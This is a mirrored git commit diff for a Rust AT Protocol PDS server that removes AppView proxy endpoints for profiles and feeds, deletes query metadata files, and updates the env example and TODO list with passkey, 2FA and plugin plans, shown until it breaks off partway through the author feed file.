mirror of
https://tangled.org/tranquil.farm/tranquil-pds
synced 2026-02-08 21:30:08 +00:00
Remove a bunch of unnecessary tests & endpoints
This commit is contained in:
24
.env.example
24
.env.example
@@ -48,25 +48,13 @@ AWS_SECRET_ACCESS_KEY=minioadmin
|
||||
# Optional: rotation key for PLC operations (defaults to user's key)
|
||||
# PLC_ROTATION_KEY=did:key:...
|
||||
# =============================================================================
|
||||
# AppView Federation
|
||||
# DID Resolution
|
||||
# =============================================================================
|
||||
# Cache TTL for resolved DID documents (default: 300 seconds)
|
||||
# DID_CACHE_TTL_SECS=300
|
||||
# =============================================================================
|
||||
# Relays
|
||||
# =============================================================================
|
||||
# AppViews are resolved via DID-based discovery. Configure by mapping lexicon
|
||||
# namespaces to AppView DIDs. The DID document is fetched and the service
|
||||
# endpoint is extracted automatically.
|
||||
#
|
||||
# Format: APPVIEW_DID_<NAMESPACE>=<did>
|
||||
# Where <NAMESPACE> uses underscores instead of dots (e.g., APP_BSKY for app.bsky)
|
||||
#
|
||||
# Default: app.bsky and com.atproto -> did:web:api.bsky.app
|
||||
#
|
||||
# Examples:
|
||||
# APPVIEW_DID_APP_BSKY=did:web:api.bsky.app
|
||||
# APPVIEW_DID_COM_WHTWND=did:web:whtwnd.com
|
||||
# APPVIEW_DID_BLUE_ZIO=did:plc:some-custom-appview
|
||||
#
|
||||
# Cache TTL for resolved AppView endpoints (default: 300 seconds)
|
||||
# APPVIEW_CACHE_TTL_SECS=300
|
||||
#
|
||||
# Comma-separated list of relay URLs to notify via requestCrawl
|
||||
# CRAWLERS=https://bsky.network,https://relay.upcloud.world
|
||||
# =============================================================================
|
||||
|
||||
@@ -1,28 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT key_bytes, encryption_version FROM user_keys k JOIN users u ON k.user_id = u.id WHERE u.did = $1",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "key_bytes",
|
||||
"type_info": "Bytea"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "encryption_version",
|
||||
"type_info": "Int4"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
true
|
||||
]
|
||||
},
|
||||
"hash": "36001fc127d7a3ea4e53e43a559cd86107e74d02ddcc499afd81049ce3c6789b"
|
||||
}
|
||||
@@ -1,46 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT r.record_cid, r.rkey, r.created_at, u.did, u.handle\n FROM records r\n JOIN repos rp ON r.repo_id = rp.user_id\n JOIN users u ON rp.user_id = u.id\n WHERE u.did = ANY($1) AND r.collection = 'app.bsky.feed.post'\n ORDER BY r.created_at DESC\n LIMIT 50",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "rkey",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "created_at",
|
||||
"type_info": "Timestamptz"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "did",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 4,
|
||||
"name": "handle",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"TextArray"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "4bc1e1169d95eac340756b1ba01680caa980514d77cc7b41361c2400f6a5f456"
|
||||
}
|
||||
@@ -1,23 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "val",
|
||||
"type_info": "Int4"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid",
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
null
|
||||
]
|
||||
},
|
||||
"hash": "5f02d646eb60f99f5cc1ae7b8b41e62d053a6b9f8e9452d5cef3526b8aef8288"
|
||||
}
|
||||
@@ -1,22 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "94e290ff1acc15ccb8fd57fce25c7a4eea1e45c7339145d5af2741cc04348c8f"
|
||||
}
|
||||
@@ -1,22 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.graph.follow' LIMIT 5000",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false
|
||||
]
|
||||
},
|
||||
"hash": "a3e7b0c0861eaf62dda8b3a2ea5573bbb64eef74473f2b73cb38e2948cb3d7cc"
|
||||
}
|
||||
@@ -1,47 +0,0 @@
|
||||
{
|
||||
"db_name": "PostgreSQL",
|
||||
"query": "\n SELECT record_cid, collection, rkey, created_at, repo_rev\n FROM records\n WHERE repo_id = $1 AND repo_rev > $2\n ORDER BY repo_rev ASC\n LIMIT 10\n ",
|
||||
"describe": {
|
||||
"columns": [
|
||||
{
|
||||
"ordinal": 0,
|
||||
"name": "record_cid",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 1,
|
||||
"name": "collection",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 2,
|
||||
"name": "rkey",
|
||||
"type_info": "Text"
|
||||
},
|
||||
{
|
||||
"ordinal": 3,
|
||||
"name": "created_at",
|
||||
"type_info": "Timestamptz"
|
||||
},
|
||||
{
|
||||
"ordinal": 4,
|
||||
"name": "repo_rev",
|
||||
"type_info": "Text"
|
||||
}
|
||||
],
|
||||
"parameters": {
|
||||
"Left": [
|
||||
"Uuid",
|
||||
"Text"
|
||||
]
|
||||
},
|
||||
"nullable": [
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
false,
|
||||
true
|
||||
]
|
||||
},
|
||||
"hash": "f3f1634b4f03a4c365afa02c4504de758bc420f49a19092d5cd1c526c7c7461e"
|
||||
}
|
||||
39
TODO.md
39
TODO.md
@@ -38,19 +38,20 @@ Accounts controlled by other accounts rather than having their own password. Whe
|
||||
- [ ] Log all actions with both actor DID and controller DID
|
||||
- [ ] Audit log view for delegated account owners
|
||||
|
||||
### Passkey support
|
||||
Modern passwordless authentication using WebAuthn/FIDO2, alongside or instead of passwords.
|
||||
### Passkeys and 2FA
|
||||
Modern passwordless authentication using WebAuthn/FIDO2, plus TOTP for defense in depth.
|
||||
|
||||
- [ ] passkeys table (id, did, credential_id, public_key, sign_count, created_at, last_used, friendly_name)
|
||||
- [ ] Generate WebAuthn registration challenge
|
||||
- [ ] Verify attestation response and store credential
|
||||
- [ ] UI for registering new passkey from settings
|
||||
- [ ] Detect if account has passkeys during OAuth authorize
|
||||
- [ ] Offer passkey option alongside password
|
||||
- [ ] Generate authentication challenge and verify assertion
|
||||
- [ ] Update sign count (replay protection)
|
||||
- [ ] Allow creating account with passkey instead of password
|
||||
- [ ] List/rename/remove passkeys in settings
|
||||
- [ ] user_totp table (did, secret_encrypted, verified, created_at, last_used)
|
||||
- [ ] WebAuthn registration challenge generation and attestation verification
|
||||
- [ ] TOTP secret generation with QR code setup flow
|
||||
- [ ] Backup codes (hashed, one-time use) with recovery flow
|
||||
- [ ] OAuth authorize flow: password → 2FA (if enabled) → passkey (as alternative)
|
||||
- [ ] Passkey-only account creation (no password)
|
||||
- [ ] Settings UI for managing passkeys, TOTP, backup codes
|
||||
- [ ] Trusted devices option (remember this browser)
|
||||
- [ ] Rate limit 2FA attempts
|
||||
- [ ] Re-auth for sensitive actions (email change, adding new auth methods)
|
||||
|
||||
### Private/encrypted data
|
||||
Records that only authorized parties can see and decrypt. Requires key federation between PDSes.
|
||||
@@ -65,6 +66,22 @@ Records that only authorized parties can see and decrypt. Requires key federatio
|
||||
- [ ] Protocol for sharing decryption keys between PDSes
|
||||
- [ ] Handle key rotation and revocation
|
||||
|
||||
### Plugin system
|
||||
Extensible architecture allowing third-party plugins to add functionality, like minecraft mods or browser extensions.
|
||||
|
||||
- [ ] Research: survey Fabric/Forge, VS Code, Grafana, Caddy plugin architectures
|
||||
- [ ] Evaluate rust approaches: WASM, dynamic linking, subprocess IPC, embedded scripting (Lua/Rhai)
|
||||
- [ ] Define security model (sandboxing, permissions, resource limits)
|
||||
- [ ] Plugin manifest format (name, version, deps, permissions, hooks)
|
||||
- [ ] Plugin discovery, loading, lifecycle (enable/disable/hot reload)
|
||||
- [ ] Error isolation (bad plugin shouldn't crash PDS)
|
||||
- [ ] Extension points: request middleware, record lifecycle hooks, custom XRPC endpoints
|
||||
- [ ] Extension points: custom lexicons, storage backends, auth providers, notification channels
|
||||
- [ ] Extension points: firehose consumers (react to repo events)
|
||||
- [ ] Plugin SDK crate with traits and helpers
|
||||
- [ ] Example plugins: custom feed algorithm, content filter, S3 backup
|
||||
- [ ] Plugin registry with signature verification and version compatibility
|
||||
|
||||
---
|
||||
|
||||
## Completed
|
||||
|
||||
@@ -1,5 +1,3 @@
|
||||
mod preferences;
|
||||
mod profile;
|
||||
|
||||
pub use preferences::{get_preferences, put_preferences};
|
||||
pub use profile::{get_profile, get_profiles};
|
||||
|
||||
@@ -1,290 +0,0 @@
|
||||
use crate::api::proxy_client::proxy_client;
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, RawQuery, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use jacquard_repo::storage::BlockStore;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::{Value, json};
|
||||
use std::collections::HashMap;
|
||||
use tracing::{error, info};
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetProfileParams {
|
||||
pub actor: String,
|
||||
}
|
||||
|
||||
#[derive(Serialize, Deserialize, Clone)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct ProfileViewDetailed {
|
||||
pub did: String,
|
||||
pub handle: String,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub display_name: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub description: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub avatar: Option<String>,
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
pub banner: Option<String>,
|
||||
#[serde(flatten)]
|
||||
pub extra: HashMap<String, Value>,
|
||||
}
|
||||
|
||||
#[derive(Serialize, Deserialize)]
|
||||
pub struct GetProfilesOutput {
|
||||
pub profiles: Vec<ProfileViewDetailed>,
|
||||
}
|
||||
|
||||
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
|
||||
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.ok()??;
|
||||
let record_row = sqlx::query!(
|
||||
"SELECT record_cid FROM records WHERE repo_id = $1 AND collection = 'app.bsky.actor.profile' AND rkey = 'self'",
|
||||
user_id
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.ok()??;
|
||||
let cid: cid::Cid = record_row.record_cid.parse().ok()?;
|
||||
let block_bytes = state.block_store.get(&cid).await.ok()??;
|
||||
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
|
||||
}
|
||||
|
||||
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
|
||||
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
|
||||
profile.display_name = Some(display_name.to_string());
|
||||
}
|
||||
if let Some(description) = local_record.get("description").and_then(|v| v.as_str()) {
|
||||
profile.description = Some(description.to_string());
|
||||
}
|
||||
}
|
||||
|
||||
async fn proxy_to_appview(
|
||||
state: &AppState,
|
||||
method: &str,
|
||||
params: &HashMap<String, String>,
|
||||
auth_did: &str,
|
||||
auth_key_bytes: Option<&[u8]>,
|
||||
) -> Result<(StatusCode, Value), Response> {
|
||||
let resolved = match state.appview_registry.get_appview_for_method(method).await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return Err((
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(
|
||||
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
|
||||
),
|
||||
)
|
||||
.into_response());
|
||||
}
|
||||
};
|
||||
let target_url = format!("{}/xrpc/{}", resolved.url, method);
|
||||
info!("Proxying GET request to {}", target_url);
|
||||
let client = proxy_client();
|
||||
let request_builder = client.get(&target_url).query(params);
|
||||
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
|
||||
}
|
||||
|
||||
async fn proxy_to_appview_raw(
|
||||
state: &AppState,
|
||||
method: &str,
|
||||
raw_query: Option<&str>,
|
||||
auth_did: &str,
|
||||
auth_key_bytes: Option<&[u8]>,
|
||||
) -> Result<(StatusCode, Value), Response> {
|
||||
let resolved = match state.appview_registry.get_appview_for_method(method).await {
|
||||
Some(r) => r,
|
||||
None => {
|
||||
return Err((
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(
|
||||
json!({"error": "UpstreamError", "message": "No upstream AppView configured"}),
|
||||
),
|
||||
)
|
||||
.into_response());
|
||||
}
|
||||
};
|
||||
let target_url = match raw_query {
|
||||
Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q),
|
||||
None => format!("{}/xrpc/{}", resolved.url, method),
|
||||
};
|
||||
info!("Proxying GET request to {}", target_url);
|
||||
let client = proxy_client();
|
||||
let request_builder = client.get(&target_url);
|
||||
proxy_request(request_builder, auth_did, auth_key_bytes, method, &resolved.did).await
|
||||
}
|
||||
|
||||
async fn proxy_request(
|
||||
mut request_builder: reqwest::RequestBuilder,
|
||||
auth_did: &str,
|
||||
auth_key_bytes: Option<&[u8]>,
|
||||
method: &str,
|
||||
appview_did: &str,
|
||||
) -> Result<(StatusCode, Value), Response> {
|
||||
if let Some(key_bytes) = auth_key_bytes {
|
||||
match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
|
||||
Ok(service_token) => {
|
||||
request_builder =
|
||||
request_builder.header("Authorization", format!("Bearer {}", service_token));
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Failed to create service token: {:?}", e);
|
||||
return Err((
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response());
|
||||
}
|
||||
}
|
||||
}
|
||||
match request_builder.send().await {
|
||||
Ok(resp) => {
|
||||
let status =
|
||||
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
|
||||
match resp.json::<Value>().await {
|
||||
Ok(body) => Ok((status, body)),
|
||||
Err(e) => {
|
||||
error!("Error parsing proxy response: {:?}", e);
|
||||
Err((
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({"error": "UpstreamError"})),
|
||||
)
|
||||
.into_response())
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Error sending proxy request: {:?}", e);
|
||||
if e.is_timeout() {
|
||||
Err((
|
||||
StatusCode::GATEWAY_TIMEOUT,
|
||||
Json(json!({"error": "UpstreamTimeout"})),
|
||||
)
|
||||
.into_response())
|
||||
} else {
|
||||
Err((
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({"error": "UpstreamError"})),
|
||||
)
|
||||
.into_response())
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn get_profile(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
Query(params): Query<GetProfileParams>,
|
||||
) -> Response {
|
||||
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
|
||||
let auth_user = if let Some(h) = auth_header {
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
|
||||
crate::auth::validate_bearer_token(&state.db, &token)
|
||||
.await
|
||||
.ok()
|
||||
} else {
|
||||
None
|
||||
}
|
||||
} else {
|
||||
None
|
||||
};
|
||||
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
|
||||
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
|
||||
let mut query_params = HashMap::new();
|
||||
query_params.insert("actor".to_string(), params.actor.clone());
|
||||
let (status, body) = match proxy_to_appview(
|
||||
&state,
|
||||
"app.bsky.actor.getProfile",
|
||||
&query_params,
|
||||
auth_did.as_deref().unwrap_or(""),
|
||||
auth_key_bytes.as_deref(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(r) => r,
|
||||
Err(e) => return e,
|
||||
};
|
||||
if !status.is_success() {
|
||||
return (status, Json(body)).into_response();
|
||||
}
|
||||
let mut profile: ProfileViewDetailed = match serde_json::from_value(body) {
|
||||
Ok(p) => p,
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
if let Some(ref did) = auth_did
|
||||
&& profile.did == *did
|
||||
&& let Some(local_record) = get_local_profile_record(&state, did).await {
|
||||
munge_profile_with_local(&mut profile, &local_record);
|
||||
}
|
||||
(StatusCode::OK, Json(profile)).into_response()
|
||||
}
|
||||
|
||||
pub async fn get_profiles(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
RawQuery(raw_query): RawQuery,
|
||||
) -> Response {
|
||||
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
|
||||
let auth_user = if let Some(h) = auth_header {
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
|
||||
crate::auth::validate_bearer_token(&state.db, &token)
|
||||
.await
|
||||
.ok()
|
||||
} else {
|
||||
None
|
||||
}
|
||||
} else {
|
||||
None
|
||||
};
|
||||
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
|
||||
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
|
||||
let (status, body) = match proxy_to_appview_raw(
|
||||
&state,
|
||||
"app.bsky.actor.getProfiles",
|
||||
raw_query.as_deref(),
|
||||
auth_did.as_deref().unwrap_or(""),
|
||||
auth_key_bytes.as_deref(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(r) => r,
|
||||
Err(e) => return e,
|
||||
};
|
||||
if !status.is_success() {
|
||||
return (status, Json(body)).into_response();
|
||||
}
|
||||
let mut output: GetProfilesOutput = match serde_json::from_value(body) {
|
||||
Ok(p) => p,
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::BAD_GATEWAY,
|
||||
Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
if let Some(ref did) = auth_did {
|
||||
for profile in &mut output.profiles {
|
||||
if profile.did == *did {
|
||||
if let Some(local_record) = get_local_profile_record(&state, did).await {
|
||||
munge_profile_with_local(profile, &local_record);
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
(StatusCode::OK, Json(output)).into_response()
|
||||
}
|
||||
@@ -1,158 +0,0 @@
|
||||
use crate::api::read_after_write::{
|
||||
FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev,
|
||||
format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview_via_registry,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::Deserialize;
|
||||
use serde_json::Value;
|
||||
use std::collections::HashMap;
|
||||
use tracing::warn;
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetActorLikesParams {
|
||||
pub actor: String,
|
||||
pub limit: Option<u32>,
|
||||
pub cursor: Option<String>,
|
||||
}
|
||||
|
||||
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
|
||||
for like in likes {
|
||||
let like_time = &like.indexed_at.to_rfc3339();
|
||||
let idx = feed
|
||||
.iter()
|
||||
.position(|fi| &fi.post.indexed_at < like_time)
|
||||
.unwrap_or(feed.len());
|
||||
let placeholder_post = PostView {
|
||||
uri: like.record.subject.uri.clone(),
|
||||
cid: like.record.subject.cid.clone(),
|
||||
author: crate::api::read_after_write::AuthorView {
|
||||
did: String::new(),
|
||||
handle: String::new(),
|
||||
display_name: None,
|
||||
avatar: None,
|
||||
extra: HashMap::new(),
|
||||
},
|
||||
record: Value::Null,
|
||||
indexed_at: like.indexed_at.to_rfc3339(),
|
||||
embed: None,
|
||||
reply_count: 0,
|
||||
repost_count: 0,
|
||||
like_count: 0,
|
||||
quote_count: 0,
|
||||
extra: HashMap::new(),
|
||||
};
|
||||
feed.insert(
|
||||
idx,
|
||||
FeedViewPost {
|
||||
post: placeholder_post,
|
||||
reply: None,
|
||||
reason: None,
|
||||
feed_context: None,
|
||||
extra: HashMap::new(),
|
||||
},
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn get_actor_likes(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
Query(params): Query<GetActorLikesParams>,
|
||||
) -> Response {
|
||||
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
|
||||
let auth_user = if let Some(h) = auth_header {
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
|
||||
crate::auth::validate_bearer_token(&state.db, &token)
|
||||
.await
|
||||
.ok()
|
||||
} else {
|
||||
None
|
||||
}
|
||||
} else {
|
||||
None
|
||||
};
|
||||
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
|
||||
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
|
||||
let mut query_params = HashMap::new();
|
||||
query_params.insert("actor".to_string(), params.actor.clone());
|
||||
if let Some(limit) = params.limit {
|
||||
query_params.insert("limit".to_string(), limit.to_string());
|
||||
}
|
||||
if let Some(cursor) = ¶ms.cursor {
|
||||
query_params.insert("cursor".to_string(), cursor.clone());
|
||||
}
|
||||
let proxy_result = match proxy_to_appview_via_registry(
|
||||
&state,
|
||||
"app.bsky.feed.getActorLikes",
|
||||
&query_params,
|
||||
auth_did.as_deref().unwrap_or(""),
|
||||
auth_key_bytes.as_deref(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(r) => r,
|
||||
Err(e) => return e,
|
||||
};
|
||||
if !proxy_result.status.is_success() {
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
let rev = match extract_repo_rev(&proxy_result.headers) {
|
||||
Some(r) => r,
|
||||
None => return proxy_result.into_response(),
|
||||
};
|
||||
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
|
||||
Ok(f) => f,
|
||||
Err(e) => {
|
||||
warn!("Failed to parse actor likes response: {:?}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
let requester_did = match &auth_did {
|
||||
Some(d) => d.clone(),
|
||||
None => return (StatusCode::OK, Json(feed_output)).into_response(),
|
||||
};
|
||||
let actor_did = if params.actor.starts_with("did:") {
|
||||
params.actor.clone()
|
||||
} else {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
let suffix = format!(".{}", hostname);
|
||||
let short_handle = if params.actor.ends_with(&suffix) {
|
||||
params.actor.strip_suffix(&suffix).unwrap_or(¶ms.actor)
|
||||
} else {
|
||||
¶ms.actor
|
||||
};
|
||||
match sqlx::query_scalar!("SELECT did FROM users WHERE handle = $1", short_handle)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
{
|
||||
Ok(Some(did)) => did,
|
||||
Ok(None) => return (StatusCode::OK, Json(feed_output)).into_response(),
|
||||
Err(e) => {
|
||||
warn!("Database error resolving actor handle: {:?}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
}
|
||||
};
|
||||
if actor_did != requester_did {
|
||||
return (StatusCode::OK, Json(feed_output)).into_response();
|
||||
}
|
||||
let local_records = match get_records_since_rev(&state, &requester_did, &rev).await {
|
||||
Ok(r) => r,
|
||||
Err(e) => {
|
||||
warn!("Failed to get local records: {}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
if local_records.likes.is_empty() {
|
||||
return (StatusCode::OK, Json(feed_output)).into_response();
|
||||
}
|
||||
insert_likes_into_feed(&mut feed_output.feed, &local_records.likes);
|
||||
let lag = get_local_lag(&local_records);
|
||||
format_munged_response(feed_output, lag)
|
||||
}
|
||||
@@ -1,160 +0,0 @@
|
||||
use crate::api::read_after_write::{
|
||||
FeedOutput, FeedViewPost, ProfileRecord, RecordDescript, extract_repo_rev, format_local_post,
|
||||
format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed,
|
||||
proxy_to_appview_via_registry,
|
||||
};
|
||||
use crate::state::AppState;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use serde::Deserialize;
|
||||
use std::collections::HashMap;
|
||||
use tracing::warn;
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetAuthorFeedParams {
|
||||
pub actor: String,
|
||||
pub limit: Option<u32>,
|
||||
pub cursor: Option<String>,
|
||||
pub filter: Option<String>,
|
||||
#[serde(rename = "includePins")]
|
||||
pub include_pins: Option<bool>,
|
||||
}
|
||||
|
||||
fn update_author_profile_in_feed(
|
||||
feed: &mut [FeedViewPost],
|
||||
author_did: &str,
|
||||
local_profile: &RecordDescript<ProfileRecord>,
|
||||
) {
|
||||
for item in feed.iter_mut() {
|
||||
if item.post.author.did == author_did
|
||||
&& let Some(ref display_name) = local_profile.record.display_name {
|
||||
item.post.author.display_name = Some(display_name.clone());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn get_author_feed(
|
||||
State(state): State<AppState>,
|
||||
headers: axum::http::HeaderMap,
|
||||
Query(params): Query<GetAuthorFeedParams>,
|
||||
) -> Response {
|
||||
let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok());
|
||||
let auth_user = if let Some(h) = auth_header {
|
||||
if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) {
|
||||
crate::auth::validate_bearer_token(&state.db, &token)
|
||||
.await
|
||||
.ok()
|
||||
} else {
|
||||
None
|
||||
}
|
||||
} else {
|
||||
None
|
||||
};
|
||||
let auth_did = auth_user.as_ref().map(|u| u.did.clone());
|
||||
let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone());
|
||||
let mut query_params = HashMap::new();
|
||||
query_params.insert("actor".to_string(), params.actor.clone());
|
||||
if let Some(limit) = params.limit {
|
||||
query_params.insert("limit".to_string(), limit.to_string());
|
||||
}
|
||||
if let Some(cursor) = ¶ms.cursor {
|
||||
query_params.insert("cursor".to_string(), cursor.clone());
|
||||
}
|
||||
if let Some(filter) = ¶ms.filter {
|
||||
query_params.insert("filter".to_string(), filter.clone());
|
||||
}
|
||||
if let Some(include_pins) = params.include_pins {
|
||||
query_params.insert("includePins".to_string(), include_pins.to_string());
|
||||
}
|
||||
let proxy_result = match proxy_to_appview_via_registry(
|
||||
&state,
|
||||
"app.bsky.feed.getAuthorFeed",
|
||||
&query_params,
|
||||
auth_did.as_deref().unwrap_or(""),
|
||||
auth_key_bytes.as_deref(),
|
||||
)
|
||||
.await
|
||||
{
|
||||
Ok(r) => r,
|
||||
Err(e) => return e,
|
||||
};
|
||||
if !proxy_result.status.is_success() {
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
let rev = match extract_repo_rev(&proxy_result.headers) {
|
||||
Some(r) => r,
|
||||
None => return proxy_result.into_response(),
|
||||
};
|
||||
let mut feed_output: FeedOutput = match serde_json::from_slice(&proxy_result.body) {
|
||||
Ok(f) => f,
|
||||
Err(e) => {
|
||||
warn!("Failed to parse author feed response: {:?}", e);
|
||||
return proxy_result.into_response();
|
||||
}
|
||||
};
|
||||
let requester_did = match &auth_did {
|
||||
Some(d) => d.clone(),
|
||||
None => return (StatusCode::OK, Json(feed_output)).into_response(),
|
||||
};
|
||||
let actor_did = if params.actor.starts_with("did:") {
|
||||
params.actor.clone()
|
||||
} else {
|
||||
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
|
||||
let suffix = format!(".{}", hostname);
|
||||
